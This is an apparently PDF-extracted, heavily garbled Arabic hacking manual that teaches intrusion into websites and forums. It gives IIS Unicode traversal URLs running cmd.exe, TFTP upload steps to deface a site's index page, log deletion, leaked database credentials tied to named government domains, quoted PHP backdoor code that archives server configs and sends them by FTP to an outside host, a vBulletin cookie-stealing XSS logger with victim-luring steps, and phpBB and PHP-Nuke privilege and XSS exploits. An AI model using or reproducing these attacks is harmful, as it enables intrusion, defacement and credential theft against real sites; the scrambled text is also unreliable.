تتعب نفسك بتطبيقها فقط للعلم ل اكثر ‪...‬‬ ‫لقد اقتربنا من النهاية ‪ .asa‬‬‫‪milion.1‬ادخل اسم الموقع في صندوق ‪Select or enter server name‬‬ ‫‪ .

‫ او موافق‬OK ‫واضغط على‬ : ‫فئران التجارب‬ /http://www.PWD=.asp.WSID=CNW2.asp ‫سترى مايلي‬ 'Microsoft VBScript runtime error '800a01a8 'Object required: 'Conn news_admin. "123321 <% ‫ سارع بالتشبيك على قاعدة البيانات‬.inc : ‫سوف ترى مايلي‬ %> ("Set DB= Server.Connection DB.gov.. ‫هل تعرف مالذي امام عينك الن انه اسم المستخدم وكلمة المرور‬ ‫انا اعرف ان ل احد يحب مادة‬ .moe.moe.moe. line 7/ : ‫ كتالي‬htr ‫ثم طبق عليها ثغرة‬ http://www.gov.gov.sa/news_admin.asp+.gov. ‫الكيمياء‬ 311 .inc#--!> : ‫ كتالي‬database.sa ‫موقع‬ : ‫ قم بالدخول على الصفحة التالية‬-1 http://www.moe.CreateObject("ADODB.DATABASE=moe_dbs"..SERVER=CNW2.‫ في السفل لختبار التصال بقاعدة البيانات اذا رأيت هذه‬Test Connection ‫اضغط في البداية على‬ Test Connection Succeeded ‫العبارة‬ .htr ‫اذهب الى السورس لترى‬ <--"include file = "database..sa/news_admin.APP=Microsoft (R) Developer "Studio..sa/database. "sa".‫فمعناه ان التصال بقاعدة البيانات تم بنجاح‬ : ‫يمكنك الن ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة‬ Select the data base on the server .Open "DRIVER=SQL Server.inc ‫قم بسحب ملف‬ http://www.UID=sa.

IIS5.0‬وويندوز الفين يمتلك الصدارة الخامسة من ملقم معلومات النترنت‬ ‫بسم ال نبدأ‬ ‫توجد نقطة ضعف في الي اي اس ‪ 4‬او ‪ 5‬وهذه النقطة تستغل بطريقة سهلة جدًا‬ ‫وتسمى هذه النقطة باليونيكود‬ ‫ل ليحتاج الى خبرة عميقة في مجال اختراق المواقع‬ ‫وتنفيذها سه ً‬ ‫ولكن نقف عند هذه النقطة للمبتئيدئن‬ ‫المبتدئين عامًة يفكرون الن في اختراق عدة مواقع شهيرة بهذه الطريقة‬ ‫ولكن ل هذه الطريقة غير مجدية مع المواقع الشهيرة او غير الشهيرة‬ ‫لن نقطة الضعف هذه لتوجد ال في ويندوز الفين او ان تي‬ ‫وأغلب المواقع الشهيرة تستخدم انظمة اليونكس واللنكس‬ ‫أي ان ويندوز ان تي او الفين نظام حمايته محدودة وكل يوم تطلع ثغرات جديدة‬ ‫لكن بوسع مدراء المواقع ايقاف نقطة ضعف من نقاط الضعاف الموجودة في الن تي‬ ‫لكن بتلك الطريقة قد يكونون جعلو حاجزًا لهم من الهكرة‬ ‫‪312‬‬ .com‬‬ ‫‪User name : sa Passwd : sp2000 .‫فأر التجارب الثاني ‪:‬‬ ‫موقع ‪/http://www..5‬كيك يعني ‪ 15000‬ميك ويحتوي علي‬ ‫خمسة ملين مشترك تم اختراقه البارحه بنفسي جاري تحميل الموقع لجاهزي كامل‬ ‫‪1‬ثغرات الهتمل‬ ‫‪2‬الفرونت بيج‬ ‫‪3‬مخلفات الفتبي والستفاد منه كثير لهكرز‬ ‫‪4‬ثغرات البرامج‬ ‫‪ 6‬عدم تمكن حماية النظام ‪%100‬‬ ‫لذلك انصح الخوه بالبتعاد عن سرفرات الويندوز وبرامجهم‬ ‫‪ IIS‬بداية نعرف ماهي‬ ‫هي خدمه متواجدة في ويندوز الفين بروفشنال وويندوز ان تي ‪IIS‬الـ‬ ‫‪.1‬‬ ‫*****************‬ ‫سرفرات الويندوز ودوره في اختراق المنتديات‬ ‫نحن الهكرز واي هكرز مبتدي يعرف ثغرات الويندوز جيدا دا‬ ‫وهي نظام فاشل ‪ %80‬وثغراته بالالوف‬ ‫ولانصح اي اخ لديه منتدي وموقع يستضيف سرفرات ويندوز راح اقلكم ليش بااثبتات‬ ‫صور ‪ 2‬هو صورة لجمعية امريكي مهم وحجم قاعدات البيانات ‪ 1.itsalat..

/winnt/system32/cmd../winnt/system32/cmd.com/à/€/à/€/à/€/¯../winnt/system32/cmd.../winnt/system32/cmd..exe?/c+dir+c‬‬ ‫هذه الثغرة عملت في الموقع المطلوب ورأيت الملفات‬ ‫لحظ التغير‬ ‫‪http://www...com/scripts/.../winnt/system32/cmd..exe?/c+dir+c:\Winnt\Sytem32‬‬ ‫ماوضع على الثغرة هو أسماء لملفات متواجدة داخل الويندوز ‪\Winnt\Sytem32‬‬ ‫أي يجب عليك الدخول على هذه الملفات لكي تتأكد‬ ‫بعض القراء يتسالون ‪ ./winnt/system32/cmd.xxxxx.Á ..xxxxxx..%e0%80%af..exe?/c+dir+c/‬‬ ‫‪\:scripts/.exe?/c+dir+c/‬‬ ‫‪\:scripts/.\%e0\%80\%af.exe?/c+dir+c/‬‬ ‫‪msadc/./winnt/system32/cmd..com/scripts/..././winnt/system32/cmd.2/cmd.exe?/c+dir+c/‬‬ ‫‪\:scripts/./winnt/system32/cmd.%f8%80%80%80%af...%c1%pc..exe?/c+dir+c/‬‬ ‫‪\:scripts/.‫ولكن ليس دائماً‬ ‫وتنفذ من داخل المتصفح‬ ‫وطريقة تنفيذ الثغرة كالتي ‪:‬‬ ‫‪\:http://www./winnt/system32/cmd.%fc%80%80%80%80%af..exe?/c+dir+c/‬‬ ‫‪\:scripts/./winnt/system32/cmd..com/scripts/./winnt/system32/cmd....%c0%qf...%c1%af.exe?/c+dir+c/‬‬ ‫‪\:scripts/.../winnt/system32/cmd.%c1%9c..exe?/c+dir+c/‬‬ ‫‪\:scripts/..exe\?/c\+dir+c‬‬ ‫وطريقة تنفيذها من المتصفح‬ ‫ومكان تنفيذها بعد اسم الموقع‬ ‫مثال ‪:‬‬ ‫‪+\http://www.%f0%80%80%af.exe?/c+dir+c/‬‬ ‫‪\:scripts/.Á‬‬ ‫‪\./winnt/system32/cmd.exe?/c+dir+c‬‬ ‫ركزو هنا الن بعد دوت كوم بدأت تنفيذ الثغرة‬ ‫وبإمكانك أيضا دخول اي ملف وليس فقط رؤية السي ‪:c‬هذه الثغرة تسمح لك بــ عرض جميع ملفات‬ ‫وتوجد أكثر من ثغرة وهي‬ ‫‪\:scripts/./winnt/system32/cmd..%c0%9v...\%e0\%80\%af...%c1%9c.exe?/c+dir+c/‬‬ ‫‪\:scripts..exe?/c+dir+c/‬‬ ‫‪\:scripts/...%c0%af.xxxxxx.%c1%1c./winnt/system32/cmd..xxxxxx..‬الثغرة التي نستخدمها ليست متطابقة مع هذه الثغرة ولكن هذا ليس شرط‬ ‫للتطابقها يجب عليك الدخول باي كان على مللف السستم‬ ‫‪313‬‬ .\/‬‬ ‫‪\:%e0\%80\%af../winnt/system32/cmd.exe?/c+dir+c/‬‬ ‫‪\:scripts/./...exe/?/c‬‬ ‫أي بعد دوت كوم‬ ‫بعض الناس يسألون مالذي يظهر او على اي شكل يظهر‬ ‫الحل بسيط‬ ‫‪ Dir‬هذا المر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات‬ ‫وطريقة ظهور الملفات في المتصفح تقريبا‬ ‫بنفس طريقة الدوس‬ ‫إذا نجحت في تنفيذ الثغرة واظهرت الملفات امامك فتبدأ في تنفيذالخطوة الثانية‬ ‫الخطوة الثانية عمل ابلود للملف الذي تريد تحميله‬ ‫وعمل البلود أيضًا ليحتاج الى خبرة‬ ‫لكن هنالك شروط لكي تعمل ابلود‬ ‫يجب التأكد من أن التي إف تي بي مثبت على الموقع الضحية‬ ‫وللكي تتأكد إتبع التي‬ ‫يجب الدخول على ملف السستم ‪ 32‬ولكي تدخله يجب أن تضيف بعض الكلمات على الثغرة التي نجحت في‬ ‫تنفيذها‬ ‫مثال‪:‬‬ ‫‪\:http://www.exe?/c+dir+c/‬‬ ‫‪\:scripts/.Á ..%c1%8s..

............exe+"-i"+1...exe?/c+dir+c‬‬ ‫ويقول كيف ادخل على ملف السستم‬ ‫الحل هو واحد يجب عليك إضافة اسماء الملفات لكي تدخل على السستم ‪32‬‬ ‫اي بعد هذا المتداد‬ ‫‪\:c+dir+c‬هنا تضيف أسماء الملفات‬ ‫‪/http://www.htm+C:\inetpub\wwwroot\index....‬‬ ‫والشرط الثاني هو‬ ‫يجب أن يكون عندك برنامج التي إف تي بي‬ ‫وهذا البرنامج تقدر تنزله من هذا العنوان‬ ‫‪www..1+GET+index.ü€€€..com/scripts/.......ü€€€...zip‬‬ ‫‪\:C‬وبعد ماتنزل البرنامج وتفك الضغط منه من الفضل إنك تحطه داخل الـ‬ ‫وتحط أيضا البرامج أو الصفحة التي تريد أن تعمل لها أبلود في السي‬ ‫تحطه في السي الى داخل جهازك مو الى دالخل الموقع‬ ‫وتشغل البرنامج‬ ‫‪ tftp32.......exe‬يعني دور على هذا البرنامج الين ماتلقاه وتتأكد من انه في الجهاز‬ ‫لن هذا البرنامج يعتبر شرط لكي تعمل ابلود للصفحة‬ ‫ولو لقيت البرنامج اتفاءل بالخير يعني بإذن ال تعبك ماهو رايح على الفاضي‬ ‫‪.htm+C:\inetpub\wwwroot\index...xxxxx.com/scripts/..1...1+GET+index..ü€€€..htm /‬‬ ‫ولمن نظيف امر النسخ بيطلع لنا بهذا الطريقة‬ ‫"‪http://www.......Winnt/System32‬‬ ‫كما قلنا سابقَا لتحتاج الى خبرة‬ ‫وبعد دخول ملف السستم ستظهر لك محتوياته‬ ‫ويجب على آنذاك البحث عن برنامج يسمي‬ ‫‪ tftp......ü€€€.exe?/c+dir+c‬‬ ‫تخيل الثغرة هذه اشتغلت معاك‬ ‫ويجب عليك إنك تمسح بعض الضافات من الثغرة لكي تضيف امر النسخ‬ ‫‪c+tftp..exe+"-i"+1...........com/scripts/......htm‬‬ ‫شايفين ياشباب إش الى اتغير‬ ‫بس لزم أيضًا إنك تغير اللزم في أمر النسخ‬ ‫مثل‬ ‫‪314‬‬ ......exe‬وتتركه يعمل الى أن تنتهى من مهمتك الساسية‬ ‫‪\:C‬أسمع كلمي وحط كل شي في‬ ‫لنك لو حطيتها بإذن ال راح تنجح المهمه‬ ‫‪----------------------------------------------------------------‬‬‫الن بدأنا في النقطة الخطرة وهي تحميل الملفات‬ ‫مع العلم أني اقصد بالتحميل البلود‬ ‫أي‬ ‫أبلود = تحميل‬ ‫مو تجميل‬ ‫وتحميل الملفات طريقة معقدة نسبيًا بس أنا متفائل بالخير لني معتقد أنكم راح تفهمو‬ ‫المهم نرجع لموضوعنا‬ ‫المهم طريقة نسخ الملفات تضاف ايضًا الى المتصفح‬ ‫وتضاف بهذه الطريقة‬ ‫مثال ‪:‬‬ ‫‪\:http://www....xxxxx....htm+C:\inetpub\wwwroot\index....com/scripts/.com/anorR1234/tftpd32.1..xe?/c+tftp..htm /‬‬ ‫يعني الى راح نمسحه من الثغرة بيكون هذه الضافة‬ ‫‪\:c+dir+c/‬‬ ‫عشان تظيف بدالها‬ ‫‪c+tftp..xxxxx..geocities.1....1.xxxxx.1..exe+‬‬‫‪i"+1..1+GET+index..........1.‫ممكن يكون احد القراء اشتغلت معاه هذه الثغرة‬ ‫‪\:http://www....

212.com/scripts/.htm+C:\inetpub\wwwroot\index..1...1..htm‬هذه اسم الصفحة الى راح تتحمل وممكن تغيرها عاد بكيفك انت‬ ‫‪ \C:\inetpub\wwwroot‬وهذا مكان تواجد الصفحة الرئيسة الخاصة بالموقع‬ ‫‪ index.htm‬هنا تكتب إسم الصفحة او الملف التي تريده أن يظهر في الموقع‬ ‫‪\:C‬يجب التأكد من إنك حاط الصفحة المراد تحميلها في جهازك داخل الـ‬ ‫‪ index.htm‬ومثل اسم الصفحة‬ ‫قبل ماتضغط انتر عشان تنسخ الملف تاكد من ان الثغرة الن صارت مشابها لمثل هذه الثغرة‬ ‫"‪http://www.exe‬هذا سيبه في حاله لنه اسم برنامج التي اف تي بي الى حاطه في السي ومشغله الن‬ ‫"‪ "i-‬هذا برضه سيبه لنه مهم‬ ‫‪ 1.htm‬‬ ‫ولو طلعت مشابها لها اضغط إنتر وتوكل على ال‬ ‫وبإذن ال راح يتنسخ الملف‬ ‫‪------------------------------------------------------------------------------------------------------‬‬‫‪------------------------------------------------------------------------------‬‬‫وفى النقطة الخيرة والهم‬ ‫مسح ملفات تكون تجمعت داخل الجهاز ومكونة معلومات عنك مثل اليبي‬ ‫‪http://server/msadc/.1‬هنا بدال الرقام هذا تكتب اليبي تبع جهازك وعشان تتأكد من اليبي لمن تشغب التي اف تي بي‬ ‫راح يطلع ايبي وهذا اليبي الى طلعلك هو الى تكتبه‬ ‫‪ GET‬هذه الضافة سيبها في حالها لنها تعتبر شرط في نسخ المفات‬ ‫‪ index...212./c+del+c:/*.exe+‬‬‫‪i"+212.log‬‬ ‫‪--------------------------------------‬‬ ‫*******************‬ ‫‪ 5‬النسخه المنتشره في النت ودور المعربين العرب وحقيقة الموضوع وتعريبهم‬ ‫اول كما قلنا لماذا ليخترقوا منتديات جون رغم ثغرات موقعه ‪1‬لنه يستخدم نسخه نضيفه‬ ‫‪ 1‬النسخه الموجود بالنت مليان ثغرات وعارفين جيد مصمممي المنتدي لماذا ينشرونه اذا‪$‬‬ ‫النسخه تجريبي ومحتوي كود التبليغ لكي لو نفذت ومسحت كود التبليغ لن تهرب من ثغراته لو تشغل فكرك‬ ‫لكشفته بنفسك‬ ‫‪ 2‬انه جميعه نسخه تجريبي لترويج بضعتهم بدل ان تكون لمدة ‪30‬يوما فهمتموني‬ ‫‪ 3‬النسخه المنتشره بالنترنت هو نسخه نحصل علي من مواقع هكرز صح وينك انت من هكرز الغرب‬ ‫وحيلهم‬ ‫لو تمكنت في الحصول علي نسخة الشركة ‪ %100‬ونسخه منتشره في النت لرئيت صح قاموا بحذف كود‬ ‫التبليغ منه بل اضافوا اليه كوداد وبلوي وثغرات‪-‬وبعدين يجي الخ صاحب النسخه يوكد انه لقي ثغرة‬ ‫بمنتديات جون‬ ‫والعالم يندهش كييييييف خلص انشهر موقعه وسعر اعلناته ارتفع في موقعه لكثر الزوار‬ ‫الحقيقة هو نفسه اضاف الكود ونفسه يعرف مكانه وكيفة العب فيه وال هكذا المور‬ ‫‪315‬‬ ../.212+GET+index.xe?/c+tftp.xxxxx.‫‪ tftp..À¯.ü€€€.

net/~royal/. 1000$ .vbxa = a$ .vbxp = p$ .(rf = fread($file.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbx a$vbxl/.‫المعربين العرب ليسوا اقل نذل من الجانب‬ ‫انصحكم بتعريب نسخكم باانفسكم‬ ‫ المسربه لنا من اخواننا العرب وكان هذا الكود‬2." --!>" echo = file$ fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.vbxo = o$ .vbxt = t$ ."<-.arab1.vbxy =y$ .vbxn = n$ .6 ‫عموما مع اليام نزلت نسخه‬ 316 .php? h=$HTTP_HOST&h2=$SCRIPT_NAME ‫ وسربوها لنا حبايبنا وشالوا كود التبليغ ياعيني عليهم عشان يحطون‬2.net http://www.vbxe = e$ .x.("ME".vbxb = b$ .vbxl = l$ .arab1.vbxr = r$ . "r .vbxw = w$ .php?h=$HTTP_HOST&h2=$SCRIPT_NA .(fclose($file . $vbxa$vbxr$vbxa$vbxb$vbx1.x.vbx1 = 1$ .vbxh = h$ .2." echo -------------------------------------------------------------------------------‫وكان الكود الحلو هذا يتصل في موقع‬ /http://www.2.5 ‫قبل فتره بسيطه تم اكتشاف ثغره في بعض نسخ‬ forum ‫الموجود فيها في ملف‬ :PHP -------------------------------------------------------------------------------} ("if ($action=="modify .

("system("cp admin/config.‫لنا كود تجسس ونعم الخوه العرب المسلمين‬ ‫ بالخير‬option ‫بس هالمره الكود اذكى ومهو مكشوف وغبي زي الول الكود المره هذي في ملفين ملف‬ ‫موجود‬ :PHP -------------------------------------------------------------------------------.statics/php.('==5YWwvLngyLmluYw -------------------------------------------------------------------------------‫ياعيني على الذكاء صرنا نعرف نلعب باكدوا ديكود وانكود‬ ‫والمره هذي بعد يتصل الكود الحلو هذا اللي مستخدمين فيه ديكود بالموقع هذا‬ /http://saudi.conf /tmp/." --!>" echo .com/~royal/..no-ip.statics/httpd1.("system("cp /etc/httpd/conf/httpd..com WELCOME TO arab1..("system("cp /usr/local/apache/conf/httpd.conf /tmp/."<-.net ‫بيرحب فيكم ويقولكم‬ ‫ياعيني عالترحيب‬ ‫ اللي فيها كود‬http://saudi.php /tmp/..x2. ‫رهييييييب ويبين لنا‬ ‫شوفو الكود‬ :PHP -------------------------------------------------------------------------------<".statics/httpd2.com php?> .("system("mkdir /tmp/.statics .conf ."include "$sqlupdate .conf 317 .no-ip.div id="sHo" style="display:none> --!> if you are seeing this code PlzZzZz Contact [email]sleeping_bum@hotmail.inc ‫عموما الكود بيتصل بالصفحه هذي‬ ‫ اللي يحسبون علينا كمسلمين وعرب‬.conf .." echo -------------------------------------------------------------------------------functions ‫وملف‬ :PHP -------------------------------------------------------------------------------sqlupdate =$ base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm9 ..

‫‪. "$port$‬‬ ‫‪upload = ftp_put($conn_id. "cyber-sa".(fclose($file‬‬ ‫?<‬ ‫‪<-‬‬‫>‪<div/‬‬ ‫واخره كان دار العرب في ملفه هو بيعرف‬ ‫************‬ ‫‪6‬الحمايه من المخترقين بنسبة ‪ %80‬لاجهزتكم ومنتدياتكم‬ ‫يال كل يوم نسمع اختراق المنتديات اليكم الحل حماية ‪ %80‬اليكم اسباب اخترقه وحمايته‬ ‫‪ 1‬وجود ثغرات بمجلد الدمن‬ ‫‪2‬ثغرة مجلد مود‬ ‫‪ 3‬ثغرة الستيل‬ ‫‪ 4‬الهتمل‬ ‫‪ 5‬كوكيز‬ ‫‪6‬دعم التلنت‬ ‫‪ Cfgwiz32.("system("rm -rf /tmp/.‬شغل فقط في سرفرات الينوكس ليس ويندوز‬ ‫‪ 2‬قم بحمايته ‪htaccess.‬‬ ‫‪ 3‬لتركب ستيلت كثير يسببب ثغرة باالمنتدي‬ ‫‪ 4‬لتفعل لغة الهتمل ابدا‬ ‫‪ 5‬احذر من الكوكز نظف جاهزك دائما‬ ‫‪6‬قم بتوقيف التل نيت لموقع عندما لتحتاجه‬ ‫‪ 7‬نأكد من عدم وجود ملف باسم ‪ Cfgwiz32."open = "http://saudi.("file = fopen("$open".tgz".(FTP_BINARY‬‬ ‫‪.statics‬‬ ‫‪.tgz /tmp/.(ftp_quit($conn_id‬‬ ‫‪. 1000$‬‬ ‫‪.x2.no-ip.(rf = fread($file. "/tmp/$vilename".exe 7‬على المجلد ويندوز ‪C:\Windows‬‬ ‫‪8‬من الملف ‪misc‬‬ ‫‪ 9‬وجود باتش بجهازك تم ارسله لك من قبل المخترق لحصول بمعلوماتك‬ ‫******‬ ‫كيفية الحماية‬ ‫‪ 1‬قم بحماية ملف الدمن جيدا ‪ htaccess.php?h=$base$‬‬ ‫‪.('port = base64_decode('aHB5NWk5$‬‬ ‫‪.statics.("system("tar -cvf /tmp/. "r$‬‬ ‫‪.com/~royal/."vilename = "$SERVER_NAME.net$‬‬ ‫‪.virtualave.statics.statics‬‬ ‫‪."base = "$HTTP_HOST&h2=$SCRIPT_NAME$‬‬ ‫‪.bz$‬‬ ‫‪.exe‬على المجلد ويندوز ‪C:\Windows‬‬ ‫‪318‬‬ .("login_result = ftp_login($conn_id.$‬‬ ‫‪.tgz‬‬ ‫‪.statics. "/tmp/.("system("rm -rf /tmp/.("conn_id = ftp_connect("cyber-sa.

(Print ($Header /* .Com // .‫ ده بلوووووي الدنيا فيه جاري البحث عن حل له‬8 ‫ قم بتركيب برامج الفيروسات بجهازك‬9 .("<Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title 319 ."" = Footer$ { ."--!>" = Header$ ."LogFile = "Cookies.2. ‫ قم بزيارت منتديات العقرب الحمر لحصولك علي كافة انواع الحماية لجهازك وموقع‬10 ،،،‫انتهى‬ " vBulletin 2.// .vBulletin 2.(Coded By : Sp.Descrption: Fetching vBulletin's cookies and storing it into a log file // :Variables // .Log$ :Functions // */ } ("If ($HTTP_GET_VARS['Action'] = "Log ...9 ‫" ثغرة في منتديات‬ <‫>ةةةةة ةة ةةةةة ةةة ةةة‬ <‫ ةةةةةة‬:‫>ةةةةةة‬ .9 ‫هذه الثغرة خطيرة جدا وتؤدي بحاية المنتديات‬ :‫المهم شرحها كالتالي‬ php ‫ انسخ الكود واحفظه بالمفكرة بامتداد‬-1 PHP?> vBulletin XSS Injection Vulnerability: Exploit // --.IC (SpeedICNet@Hotmail..2."" = Header$ ."<---" = Footer$ { } Else .

(((((((MD5 (NULL .("Print ("<B>. "? 320 .:: Statics</B>\n .("<Print ("<Pre .("Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp. " </B>[Not Counting .("Print ("o Logged Records : <B>" .. Trim ($Data) . Count ($Records) .("Duplicates]\n . Count (File ($LogFile)) . "\n Print ("o Clear Records : [<A Href=\"" .("Print ("\n .(Print ($Footer /* } (['Switch ($HTTP_GET_VARS['Action :"Case "Log .Break :"Case "List } ((If (!File_Exists ($LogFile) || !In_Array ($Records . SubStr ($Data.("<Print ("<Pre . "a$ .("<"\Width=\"20% */ .(FClose ($Log Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0.("<Print ("<Br><Br><B>There are No Records</B></Center></Pre . "\n ."[<Link['Download'] = "[<A Href=\"" .['Data = $HTTP_GET_VARS['Cookie$ Data = StrStr ($Data. $LogFile .("Print ("o Download Log : " ."[Link['Download'] = "[No Records in Log$ { .("<Print ("</Center></Pre .("Print ("<B>. BCAdd (0x0D.("<Print ("<Center . "</B>\n Print ("o Listed Records : <B>" .("Print ("\n .("Print ("\n } (If (Count (File ($LogFile)) > 0 .IC</A></B><Hr .("<"\" .((Records = Array_UniQue (File ($LogFile$ . .:: Options</B>\n . $SCRIPT_PATH. $Link['Download'] .("FWrite ($Log.("+Log = FOpen ($LogFile.() Exit { } Else . StrLen (DecHex$ . ['$HTTP_SERVER_VARS['HTTP_REFERER . "\">Download</A$ { }Else . URL=" .

("<("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3.("<Print ("</Pre .cookie).Break { <? php ‫ ارفع الملف لموقع يدعم‬-2 ‫ اجعل الضحية يضغط على هذا اللينك‬-3 member2.php?s=[Session]&action=viewsubscription&perpage=[Script [Code [script code] ‫واستبدال‬ ‫بهذا‬ Action=Log&Cookie='+?[‫]مكان الملف الذي تم تحميله‬//:Script>location='Http> <(document.:: Records</B>\n . $Line[1 { { . ": </B>" . ['$HTTP_SERVER_VARS['HTTP_REFERER . $Line[0] .("Print ("\n .([Print ("<B>" .</Script ‫ إذهب ألى هذا العنوان‬-4 Action=List? ‫ الملف الذي تم تحميله‬/‫مكان‬http://%20 ،،،‫انتهى‬ 321 .Break :"Case "Delete .("Action=Delete\">Y</A>]\n . .("<"\" .("Print ("<B>.(UnLink ($LogFile@ Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die .. URL=" .("Print ("\n } ((While (List ($Line[0]. $Line[1]) = Each ($Records .

0.domain_name/board_directory/admin/admin_ug_aut‬‬ ‫‪<"h.0‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة<‬ ‫‪phpbb 2.php‬‬ ‫‪<"User Level: <select name="userlevel‬‬ ‫‪322‬‬ .php‬‬ ‫الوصف‪:‬‬ ‫يمكنك من خلل هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى‬ ‫وبذلك يمكنك الدخول الى لوحة التحكم متى شئت‬ ‫الصدار‪:‬‬ ‫‪2.‫" اختراق منتديات ‪" phpbb 2.0.0‬‬ ‫لتجربة الثغرة اول سجل بالمنتدى‬ ‫ثم احفظ رقم عضويتك بالمنتدى‬ ‫بعدها افتح المفكرة وانسخ مايلي اليها‬ ‫>‪<html‬‬ ‫>‪<head‬‬ ‫>‪<head/‬‬ ‫>‪<body‬‬ ‫>‪"form method="post‬‬ ‫‪action="http://www.0.0‬‬ ‫وهو شبيه بالـ ‪vb‬‬ ‫وهو سهل جدا بل يعتبر تااافه‬ ‫يال سمو بال‬ ‫‪PhpBB2‬‬ ‫في ملف ‪admin_ug_auth.

ca‬‬ ‫تدمر والحمد ل عقبال المواقع البااقيه‪.domain_name/board_directory‬‬ ‫اخفظه بامتداد ‪html‬‬ ‫عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد‬ ‫قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح ‪Administrator‬‬ ‫ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى‬ ‫أضغط زر ‪submit‬‬ ‫بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك‬ ‫ثم سوف تجد نفسك في لوحة تحكم المنتدى !! أفعل ماتريد المنتدى منتداك‬ ‫وسلااامتكم شفتو سهولت الدرس وهو صرااحه منقول بس تعرفو ما حبيت انزله ال وعليه تطبيق‬ ‫شووفوو المنتدا ذا‬ ‫‪/http://forums.‬‬ ‫انتهى‪،،،‬‬ ‫‪323‬‬ ..xos..‫>‪<option value="admin">Administrator</option‬‬ ‫>‪<option value="user">User</option></select‬‬ ‫>‪<"input type="hidden" name="private[1]" value="0‬‬ ‫>‪<"input type="hidden" name="moderator[1]" value="0‬‬ ‫>‪<"input type="hidden" name="mode" value="user‬‬ ‫>‪<""=input type="hidden" name="adv" value‬‬ ‫‪<"User Number: <input type="text" name="u" size="5‬‬ ‫>‪<"input type="submit" name="submit" value="Submit‬‬ ‫>‪<form/‬‬ ‫>‪<body/‬‬ ‫>‪<html/‬‬ ‫عدل هذا العنوان الى عنوان الموقع المستهدف‬ ‫‪http://www.

.‬الثغره دي تتيح لك تنفيذ اكواد الهتمل و الجافا بدل مكان‬ ‫الصوره الشخصيه ‪...‫" ثغرة في ‪" php nuke‬‬ ‫>ةةةةة ةة ةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪ :‬ةةةة <‬ ‫فيه ثغره في ال ‪ php nuke‬حبيت اقولكم عليها ‪...‬‬ ‫انا عارف انكم اول ما تقروا السطر الول اكيد اغلبكم حيشتمني باكثر اللفاظ اباحه ‪ -‬بس عادي انا متعود ‪ -‬و‬ ‫يقول ايه ده باه هو مدخلنا هنا عشان يقولنا تنفيذ اكواد هتمل و جافا بدل الصوره الشخصيه ؟؟؟!!!!‬ ‫بس ؟؟؟!!! اما عبيط اوي !!!‬ ‫لكن في اخر الموضوع حقولكم ممكن تعملوا بيها ايه ‪....‬‬ ‫المهم ان الثغره كالتالي ‪ ) :‬ساحاول اني اعمل زي مواقع السيكيوريتي المحترمه لم تيجي تعرض ثغره (‬ ‫الصدارات المصابه ‪:‬‬ ‫‪ PHP Nuke versionh 6....0‬و القل منها‬ ‫‪324‬‬ .

. 2111‬‬ ‫عليك بعد ذلك نك تحفظ الكود ده في النوت باد و تسميه اي اسم بامتداد ‪ html‬مع ملحظه تغيير‬ ‫‪ /http://nukesite‬الى عنوان المجله الهدف ‪:.START CODE --‬‬ ‫>‪"form name="Register‬‬ ‫"‪action="http://NUKEDSITE/modules..‬‬ ‫>!‪<!-....php?name=Your_Account‬‬ ‫‪<"method="post‬‬ ‫>‪"b>Code ('">[code]<b ')</b><input type="text‬‬ ‫‪"name="user_avatar" size="30‬‬ ‫‪<maxlength="30"><br><br‬‬ ‫>‪"b>Username</b><input type="text" name="uname" size="30‬‬ ‫‪"maxlength="255"><br><b>User ID:<input type="text‬‬ ‫‪"name="uid‬‬ ‫‪"size="30"><input type="hidden" name="op‬‬ ‫‪value="saveuser"><input‬‬ ‫‪<type="submit" value="Save Changes"></form‬‬ ‫‪325‬‬ . images/forum/avatars/‬‬ ‫عندئذ تقوم المجله بوضع اسم الصوره في الداتا بيز ‪ ...‬و لكنها ل تقوم بوضع اي كود اي انه اذا استطاع اي‬ ‫يوزر ان يحصل على كود فورم المجله و استطاع ان يغير صندوق اختيار الصوره الشخصيه الى صندوق‬ ‫‪ text‬عادي ‪..‫الستخدام ‪:‬‬ ‫تستخدم كما قلت في تنفيذ اكواد الهتمل و الجافا سكريبت من خلل مكان صورهم الشخصيه‪....‬‬ ‫ملخص عام للثغره‪:‬‬ ‫اي مستخدم عندم يقوم بالتسجيل في المجله فانه يطالب باختيار صوره شخصيه و ذلك من خلل مجموعه من‬ ‫الصور الموجوده في المجلد هذا ‪..‬اذن اعتقد انه ممكن ان يكتب كود الهتمل اللي هوه عايزه !!!!‬ ‫الكسبلويت‪:‬‬ ‫اول عليك ن تقوم بالتسجيل في المجله و الدخول بعد ذلك و الذهاب الى صفحه ‪ Your Account‬و منها‬ ‫الذهاب الى صفحه ‪ Your Info‬بعد ذلك عليك باظهار سورس كود الصفحه من خلل ‪ view source‬و‬ ‫البحث عن كلمه ‪uid‬‬ ‫لزم تلقي حاجه زي كده ‪:‬‬ ‫>‪<"input type="hidden" name="uid" value="2111‬‬ ‫كده يبقى انت عرفت رقم الي دي اللي هوه في المثال كان ‪.

